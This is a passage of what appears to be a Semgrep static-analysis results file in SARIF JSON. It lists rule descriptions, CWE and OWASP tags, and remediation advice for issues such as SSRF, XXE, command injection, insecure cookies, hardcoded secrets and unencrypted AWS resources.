Ensure evaluated content is not definable by external sources.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.exec-detected.exec-detected)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected the use of exec(). exec() can be dangerous if used to evaluate dynamic content. If this content can be input from outside the program, this may be a code injection vulnerability. Ensure evaluated content is not definable by external sources."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.exec-detected.exec-detected","id":"python.lang.security.audit.exec-detected.exec-detected","name":"python.lang.security.audit.exec-detected.exec-detected","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.exec-detected.exec-detected"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Session cookie `Secure` flag is explicitly disabled. The `secure` flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the `Secure` flag by setting `secure` to `true` in configuration file."},"help":{"markdown":"Session cookie `Secure` flag is explicitly disabled. The `secure` flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the `Secure` flag by setting `secure` to `true` in configuration file.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings)\n - [https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#security](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#security)\n - [https://www.playframework.com/documentation/2.8.x/SettingsSession#Session-Configuration](https://www.playframework.com/documentation/2.8.x/SettingsSession#Session-Configuration)\n","text":"Session cookie `Secure` flag is explicitly disabled. The `secure` flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the `Secure` flag by setting `secure` to `true` in configuration file."},"helpUri":"https://semgrep.dev/r/scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings","id":"scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings","name":"scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format","id":"kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format","name":"kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected direct use of jinja2. If not done properly, this may bypass HTML escaping which opens up the application to cross-site scripting (XSS) vulnerabilities. Prefer using the Flask method 'render_template()' and templates with a '.html' extension in order to prevent XSS."},"help":{"markdown":"Detected direct use of jinja2. If not done properly, this may bypass HTML escaping which opens up the application to cross-site scripting (XSS) vulnerabilities. Prefer using the Flask method 'render_template()' and templates with a '.html' extension in order to prevent XSS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2)\n - [https://jinja.palletsprojects.com/en/2.11.x/api/#basics](https://jinja.palletsprojects.com/en/2.11.x/api/#basics)\n","text":"Detected direct use of jinja2. If not done properly, this may bypass HTML escaping which opens up the application to cross-site scripting (XSS) vulnerabilities. Prefer using the Flask method 'render_template()' and templates with a '.html' extension in order to prevent XSS."},"helpUri":"https://semgrep.dev/r/python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2","id":"python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2","name":"python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"RDS instance or cluster with hardcoded credentials in source code. It is recommended to pass the credentials at runtime, or generate random credentials using the random_password resource."},"help":{"markdown":"RDS instance or cluster with hardcoded credentials in source code. It is recommended to pass the credentials at runtime, or generate random credentials using the random_password resource.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/db_instance#master_password](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/db_instance#master_password)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/rds_cluster#master_password](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/rds_cluster#master_password)\n - [https://registry.terraform.io/providers/hashicorp/random/latest/docs/resources/password](https://registry.terraform.io/providers/hashicorp/random/latest/docs/resources/password)\n","text":"RDS instance or cluster with hardcoded credentials in source code. It is recommended to pass the credentials at runtime, or generate random credentials using the random_password resource."},"helpUri":"https://semgrep.dev/r/terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code","id":"terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code","name":"terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","MEDIUM CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS EBS volume is unencrypted. The volume, the disk I/O and any derived snapshots could be read if compromised. Volumes should be encrypted to ensure sensitive data is stored securely."},"help":{"markdown":"The AWS EBS volume is unencrypted. The volume, the disk I/O and any derived snapshots could be read if compromised. Volumes should be encrypted to ensure sensitive data is stored securely.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/ebs_volume#encrypted](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/ebs_volume#encrypted)\n - [https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html)\n","text":"The AWS EBS volume is unencrypted. The volume, the disk I/O and any derived snapshots could be read if compromised. Volumes should be encrypted to ensure sensitive data is stored securely."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted","id":"terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted","name":"terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token","id":"javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token","name":"javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a request using 'http://'. This request will be unencrypted. Use 'https://' instead."},"help":{"markdown":"Detected a request using 'http://'. This request will be unencrypted. Use 'https://' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected a request using 'http://'. This request will be unencrypted. Use 'https://' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http","id":"python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http","name":"python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized."},"help":{"markdown":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","id":"kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","name":"kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS Kinesis stream does not encrypt data at rest. The data could be read if the Kinesis stream storage layer is compromised. Enable Kinesis stream server-side encryption."},"help":{"markdown":"The AWS Kinesis stream does not encrypt data at rest. The data could be read if the Kinesis stream storage layer is compromised. Enable Kinesis stream server-side encryption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/kinesis_stream#encryption_type](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/kinesis_stream#encryption_type)\n - [https://docs.aws.amazon.com/streams/latest/dev/server-side-encryption.html](https://docs.aws.amazon.com/streams/latest/dev/server-side-encryption.html)\n","text":"The AWS Kinesis stream does not encrypt data at rest. The data could be read if the Kinesis stream storage layer is compromised. Enable Kinesis stream server-side encryption."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted","id":"terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted","name":"terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service is disabling TLS certificate verification when communicating with the server. This makes your HTTPS connections insecure. Remove the 'insecureSkipTLSVerify: true' key to secure communication."},"help":{"markdown":"Service is disabling TLS certificate verification when communicating with the server. This makes your HTTPS connections insecure. Remove the 'insecureSkipTLSVerify: true' key to secure communication.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service)\n - [https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#apiservice-v1-apiregistration-k8s-io](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#apiservice-v1-apiregistration-k8s-io)\n","text":"Service is disabling TLS certificate verification when communicating with the server. This makes your HTTPS connections insecure. Remove the 'insecureSkipTLSVerify: true' key to secure communication."},"helpUri":"https://semgrep.dev/r/yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service","id":"yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service","name":"yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The object is passed strictly to jose.JWT.sign(...) Make sure that sensitive information is not exposed through JWT token payload."},"help":{"markdown":"The object is passed strictly to jose.JWT.sign(...) Make sure that sensitive information is not exposed through JWT token payload.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.jose.security.audit.jose-exposed-data.jose-exposed-data)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"The object is passed strictly to jose.JWT.sign(...) Make sure that sensitive information is not exposed through JWT token payload."},"helpUri":"https://semgrep.dev/r/javascript.jose.security.audit.jose-exposed-data.jose-exposed-data","id":"javascript.jose.security.audit.jose-exposed-data.jose-exposed-data","name":"javascript.jose.security.audit.jose-exposed-data.jose-exposed-data","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.jose.security.audit.jose-exposed-data.jose-exposed-data"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `joblib.load()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `joblib.load()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.deserialization.tainted-joblib-django.tainted-joblib-django)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://dill.readthedocs.io/en/latest/index.html](https://dill.readthedocs.io/en/latest/index.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://joblib.readthedocs.io/en/latest/generated/joblib.load.html/](https://joblib.readthedocs.io/en/latest/generated/joblib.load.html/)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `joblib.load()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.django.deserialization.tainted-joblib-django.tainted-joblib-django","id":"python.django.deserialization.tainted-joblib-django.tainted-joblib-django","name":"python.django.deserialization.tainted-joblib-django.tainted-joblib-django","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.deserialization.tainted-joblib-django.tainted-joblib-django"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/returntocorp/java-xxe-research](https://github.com/returntocorp/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities","id":"kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities","name":"kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"help":{"markdown":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly","id":"java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly","name":"java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host)\n - [https://goteleport.com/blog/ssrf-attacks/](https://goteleport.com/blog/ssrf-attacks/)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host","id":"go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host","name":"go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: 